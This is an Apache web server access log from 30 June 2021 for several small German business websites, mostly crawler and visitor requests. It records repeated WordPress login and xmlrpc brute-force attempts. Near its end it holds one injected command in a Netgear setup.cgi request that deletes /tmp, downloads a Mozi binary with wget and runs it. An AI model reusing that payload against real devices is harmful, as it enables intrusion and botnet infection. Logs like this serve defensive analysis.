81.169.178.0 - - [30/Jun/2021:00:52:58 +0200] "POST /wp-cron.php?doing_wp_cron=1625007178.4645719528198242187500 HTTP/1.1" 200 - "https://www.ipcbusiness.de/wp-cron.php?doing_wp_cron=1625007178.4645719528198242187500" "WordPress/5.6.4; https://www.ipcbusiness.de/pl"
114.119.149.0 - - [30/Jun/2021:00:52:58 +0200] "GET /pl/unsere-produkte-und-services/kombiverkehr-gruener-transport HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.149.0 - - [30/Jun/2021:00:53:01 +0200] "GET /pl/unsere-produkte-und-services/kombiverkehr-gruener-transport/ HTTP/1.1" 200 10788 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
81.169.178.0 - - [30/Jun/2021:00:53:32 +0200] "POST /wp-cron.php?doing_wp_cron=1625007212.1341478824615478515625 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1625007212.1341478824615478515625" "WordPress/5.2.11; https://www.computerdoc24.de"
45.55.60.0 - - [30/Jun/2021:00:53:32 +0200] "GET /wp-login.php HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
45.55.60.0 - - [30/Jun/2021:00:53:42 +0200] "POST /wp-login.php HTTP/1.1" 200 2589 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
45.55.60.0 - - [30/Jun/2021:00:53:43 +0200] "POST /xmlrpc.php HTTP/1.1" 200 228 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
34.73.229.0 - - [30/Jun/2021:00:55:12 +0200] "GET /robots.txt HTTP/1.1" 200 69 "-" "ZoominfoBot (zoominfobot at zoominfo dot com)"
66.249.75.0 - - [30/Jun/2021:00:58:24 +0200] "GET /pl/ueber-uns/ipc-business-gmbh-firmeninformation/ HTTP/1.1" 301 334 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
188.166.94.0 - - [30/Jun/2021:01:01:10 +0200] "POST /wp-login.php HTTP/1.1" 200 2884 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
138.197.11.0 - - [30/Jun/2021:01:01:40 +0200] "GET /wp-login.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
138.197.11.0 - - [30/Jun/2021:01:01:41 +0200] "POST /wp-login.php HTTP/1.1" 200 2880 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
138.197.11.0 - - [30/Jun/2021:01:01:42 +0200] "GET /wp-login.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
138.197.11.0 - - [30/Jun/2021:01:01:43 +0200] "POST /wp-login.php HTTP/1.1" 200 2844 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
138.197.11.0 - - [30/Jun/2021:01:01:44 +0200] "POST /xmlrpc.php HTTP/1.1" 200 249 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
81.169.178.0 - - [30/Jun/2021:01:03:21 +0200] "POST /wp-cron.php?doing_wp_cron=1625007801.0085361003875732421875 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1625007801.0085361003875732421875" "WordPress/5.2.11; https://www.computerdoc24.de"
114.119.138.0 - - [30/Jun/2021:01:03:20 +0200] "GET /product/office-internet-pc-fujitsu-marken-pc-kopie/ HTTP/1.1" 200 13849 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
81.169.178.0 - - [30/Jun/2021:01:06:49 +0200] "POST /wp-cron.php?doing_wp_cron=1625008009.8690159320831298828125 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1625008009.8690159320831298828125" "WordPress/5.2.11; https://www.computerdoc24.de"
78.142.210.0 - - [30/Jun/2021:01:06:49 +0200] "GET /wp-login.php HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
78.142.210.0 - - [30/Jun/2021:01:06:50 +0200] "POST /wp-login.php HTTP/1.1" 200 2589 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
78.142.210.0 - - [30/Jun/2021:01:06:51 +0200] "POST /xmlrpc.php HTTP/1.1" 200 228 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
66.249.69.0 - - [30/Jun/2021:01:09:56 +0200] "GET /robots.txt HTTP/1.1" 301 297 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.0 - - [30/Jun/2021:01:09:57 +0200] "GET / HTTP/1.1" 301 287 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.90 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
107.180.93.0 - - [30/Jun/2021:01:10:23 +0200] "GET /wp-login.php HTTP/1.1" 200 2748 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
107.180.93.0 - - [30/Jun/2021:01:10:24 +0200] "POST /wp-login.php HTTP/1.1" 200 2886 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
107.180.93.0 - - [30/Jun/2021:01:10:25 +0200] "POST /xmlrpc.php HTTP/1.1" 200 249 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
13.67.114.0 - - [30/Jun/2021:01:10:34 +0200] "GET /wp-login.php HTTP/1.1" 200 2748 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
13.67.114.0 - - [30/Jun/2021:01:10:35 +0200] "POST /wp-login.php HTTP/1.1" 200 2884 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
13.67.114.0 - - [30/Jun/2021:01:10:37 +0200] "POST /xmlrpc.php HTTP/1.1" 200 249 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
66.249.75.0 - - [30/Jun/2021:01:10:45 +0200] "GET /robots.txt HTTP/1.1" 404 2607 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.0 - - [30/Jun/2021:01:10:46 +0200] "GET /html/impressum.html HTTP/1.1" 200 3769 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.140.188.0 - - [30/Jun/2021:01:14:22 +0200] "GET / HTTP/1.1" 403 2409 "-" "https://gdnplus.com:Gather Analyze Provide."
114.119.146.0 - - [30/Jun/2021:01:15:10 +0200] "GET /ru/unsere-produkte-und-services/digitale-loesungen-ueberwachung-der-ladeeinheiten/ HTTP/1.1" 200 11046 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.154.0 - - [30/Jun/2021:01:19:46 +0200] "GET /uk/ueber-uns/umweltverantwortung/ HTTP/1.1" 200 10889 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET / HTTP/1.1" 200 2590 "https://ff2698a27038356adbb2d0621e3ff4f6.safeframe.googlesyndication.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /assets/rollover.js HTTP/1.1" 200 5145 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /html/fusion.css HTTP/1.1" 200 1161 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /html/style.css HTTP/1.1" 200 458 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /html/site.css HTTP/1.1" 200 88 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /header_l.gif HTTP/1.1" 200 7358 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /subheader_l.gif HTTP/1.1" 200 2832 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /subheader_bl.gif HTTP/1.1" 200 1883 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /subheader_br.gif HTTP/1.1" 200 1693 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /subheader_r.gif HTTP/1.1" 200 1036 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /assets/images/autogen/Spezialreinigung-_Hhighlighted_1_1.gif HTTP/1.1" 200 1750 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /assets/images/autogen/Kontakt_Nregular_1_1.gif HTTP/1.1" 200 1596 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /assets/images/autogen/Referenzen_Nregular_1_1.gif HTTP/1.1" 200 1249 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /assets/images/autogen/Impressum_Nregular_1_1.gif HTTP/1.1" 200 1218 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /assets/images/autogen/Anfahrtskosten_Nregular_1_1.gif HTTP/1.1" 200 1732 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /assets/images/autogen/Vorher-Nachher_Nregular_1_1.gif HTTP/1.1" 200 1718 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /assets/images/autogen/clearpixel.gif HTTP/1.1" 200 43 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /kv_none_poetic_cream_none_1.gif HTTP/1.1" 200 248 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /assets/images/subheader_bak.gif HTTP/1.1" 200 44 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /assets/images/body_bak1.gif HTTP/1.1" 200 49 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:11 +0200] "GET /assets/images/body_bak.gif HTTP/1.1" 200 49 "https://www.reinigungsprofi-weck.de/html/style.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:12 +0200] "GET /favicon.ico HTTP/1.1" 404 2816 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:13 +0200] "GET /assets/images/autogen/Kontakt_NRregularRollover_1_1.gif HTTP/1.1" 200 1199 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
95.90.133.0 - - [30/Jun/2021:01:20:13 +0200] "GET /assets/images/autogen/Spezialreinigung-_HRhighlightedRollover_1_1.gif HTTP/1.1" 200 1736 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59"
:: - - [30/Jun/2021:01:20:18 +0200] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 (internal dummy connection)"
5.189.186.0 - - [30/Jun/2021:01:22:25 +0200] "GET /wp-login.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
5.189.186.0 - - [30/Jun/2021:01:22:26 +0200] "POST /wp-login.php HTTP/1.1" 200 2880 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
5.189.186.0 - - [30/Jun/2021:01:22:26 +0200] "GET /wp-login.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
5.189.186.0 - - [30/Jun/2021:01:22:27 +0200] "POST /wp-login.php HTTP/1.1" 200 2844 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
5.189.186.0 - - [30/Jun/2021:01:22:28 +0200] "POST /xmlrpc.php HTTP/1.1" 200 249 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
103.28.53.0 - - [30/Jun/2021:01:22:29 +0200] "POST /wp-login.php HTTP/1.1" 200 2886 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36"
34.216.86.0 - - [30/Jun/2021:01:22:52 +0200] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
81.169.178.0 - - [30/Jun/2021:01:23:03 +0200] "POST /wp-cron.php?doing_wp_cron=1625008983.5783228874206542968750 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1625008983.5783228874206542968750" "WordPress/5.2.11; https://www.computerdoc24.de"
209.244.159.0 - - [30/Jun/2021:01:23:03 +0200] "POST /wp-login.php HTTP/1.1" 200 2637 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
51.15.205.0 - - [30/Jun/2021:01:24:12 +0200] "GET / HTTP/1.1" 403 2411 "-" "-"
66.249.69.0 - - [30/Jun/2021:01:24:14 +0200] "GET /robots.txt HTTP/1.1" 301 297 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.0 - - [30/Jun/2021:01:24:15 +0200] "GET /impressum/ HTTP/1.1" 301 297 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.0 - - [30/Jun/2021:01:24:16 +0200] "GET /impressum/ HTTP/1.1" 301 297 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.0 - - [30/Jun/2021:01:24:16 +0200] "GET /fernwartung/ HTTP/1.1" 301 299 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
54.185.35.0 - - [30/Jun/2021:01:24:24 +0200] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
114.119.149.0 - - [30/Jun/2021:01:24:27 +0200] "GET /ru/ueber-uns/umweltverantwortung HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.149.0 - - [30/Jun/2021:01:24:29 +0200] "GET /ru/ueber-uns/umweltverantwortung/ HTTP/1.1" 200 10891 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
81.169.178.0 - - [30/Jun/2021:01:27:08 +0200] "POST /wp-cron.php?doing_wp_cron=1625009228.3165750503540039062500 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1625009228.3165750503540039062500" "WordPress/5.2.11; https://www.computerdoc24.de"
159.89.89.0 - - [30/Jun/2021:01:27:08 +0200] "GET /wp-login.php HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
159.89.89.0 - - [30/Jun/2021:01:27:15 +0200] "POST /wp-login.php HTTP/1.1" 200 2589 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
159.89.89.0 - - [30/Jun/2021:01:27:16 +0200] "POST /xmlrpc.php HTTP/1.1" 200 228 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
52.12.49.0 - - [30/Jun/2021:01:27:17 +0200] "GET /favicon.ico HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
94.23.219.0 - - [30/Jun/2021:01:27:29 +0200] "GET /wp-login.php HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
94.23.219.0 - - [30/Jun/2021:01:27:29 +0200] "POST /wp-login.php HTTP/1.1" 200 2589 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
94.23.219.0 - - [30/Jun/2021:01:27:29 +0200] "POST /xmlrpc.php HTTP/1.1" 200 228 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
54.189.107.0 - - [30/Jun/2021:01:28:05 +0200] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
54.189.107.0 - - [30/Jun/2021:01:28:19 +0200] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
34.220.193.0 - - [30/Jun/2021:01:28:56 +0200] "GET / HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
114.119.149.0 - - [30/Jun/2021:01:29:03 +0200] "GET /auftraggeber/ HTTP/1.1" 200 10861 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
34.216.219.0 - - [30/Jun/2021:01:29:30 +0200] "GET /favicon.ico HTTP/1.1" 200 2691 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
142.93.225.0 - - [30/Jun/2021:01:30:00 +0200] "GET /wp-login.php HTTP/1.1" 200 2748 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
142.93.225.0 - - [30/Jun/2021:01:30:12 +0200] "POST /wp-login.php HTTP/1.1" 200 2886 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
142.93.225.0 - - [30/Jun/2021:01:30:16 +0200] "POST /xmlrpc.php HTTP/1.1" 200 249 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
66.249.75.0 - - [30/Jun/2021:01:32:03 +0200] "GET /robots.txt HTTP/1.1" 404 2611 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.87.0 - - [30/Jun/2021:01:32:18 +0200] "GET /assets/rollover.js HTTP/1.1" 200 5145 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html)"
66.249.87.0 - - [30/Jun/2021:01:32:34 +0200] "GET /html/fusion.css HTTP/1.1" 200 1161 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html)"
66.249.87.0 - - [30/Jun/2021:01:32:34 +0200] "GET /html/style.css HTTP/1.1" 200 458 "https://www.reinigungsprofi-weck.de/" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html)"
114.119.146.0 - - [30/Jun/2021:01:34:49 +0200] "GET /fr/unsere-maerkte/drehkreuze-service-partner/ HTTP/1.1" 200 10661 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
77.88.5.0 - - [30/Jun/2021:01:36:54 +0200] "GET /robots.txt HTTP/1.1" 301 297 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.5.0 - - [30/Jun/2021:01:36:58 +0200] "GET / HTTP/1.1" 301 287 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
81.169.144.0 - - [30/Jun/2021:01:38:03 +0200] "POST /wp-cron.php?doing_wp_cron=1625009883.7548949718475341796875 HTTP/1.1" 200 - "http://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1625009883.7548949718475341796875" "WordPress/5.2.2; https://www.computerdoc24.de"
93.158.161.0 - - [30/Jun/2021:01:38:05 +0200] "GET /robots.txt HTTP/1.1" 301 297 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.5.0 - - [30/Jun/2021:01:38:09 +0200] "GET / HTTP/1.1" 301 287 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
81.169.178.0 - - [30/Jun/2021:01:38:20 +0200] "POST /wp-cron.php?doing_wp_cron=1625009900.0947990417480468750000 HTTP/1.1" 200 - "https://www.computerdoc24.de/wp-cron.php?doing_wp_cron=1625009900.0947990417480468750000" "WordPress/5.2.11; https://www.computerdoc24.de"
184.154.76.0 - - [30/Jun/2021:01:38:19 +0200] "GET //wp-content/plugins/revslider/release_log.txt HTTP/1.1" 200 - "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.76.0 - - [30/Jun/2021:01:38:21 +0200] "GET //wp-content/plugins/autoptimize/readme.txt HTTP/1.1" 200 38523 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.76.0 - - [30/Jun/2021:01:38:21 +0200] "GET //wp-content/plugins/shapepress-dsgvo/README.txt HTTP/1.1" 200 9730 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.76.0 - - [30/Jun/2021:01:38:22 +0200] "GET //wp-content/plugins/js_composer/changes.txt HTTP/1.1" 200 52167 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
184.154.76.0 - - [30/Jun/2021:01:38:22 +0200] "GET //wp-content/plugins/woocommerce/readme.txt HTTP/1.1" 200 31032 "-" "SiteLockSpider [en] (WinNT; I ;Nav)"
66.249.75.0 - - [30/Jun/2021:01:39:47 +0200] "GET /robots.txt HTTP/1.1" 301 295 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
61.242.54.0 - - [30/Jun/2021:01:42:18 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 200 2691 "-" "-"
209.145.63.0 - - [30/Jun/2021:01:42:18 +0200] "GET /wp-login.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
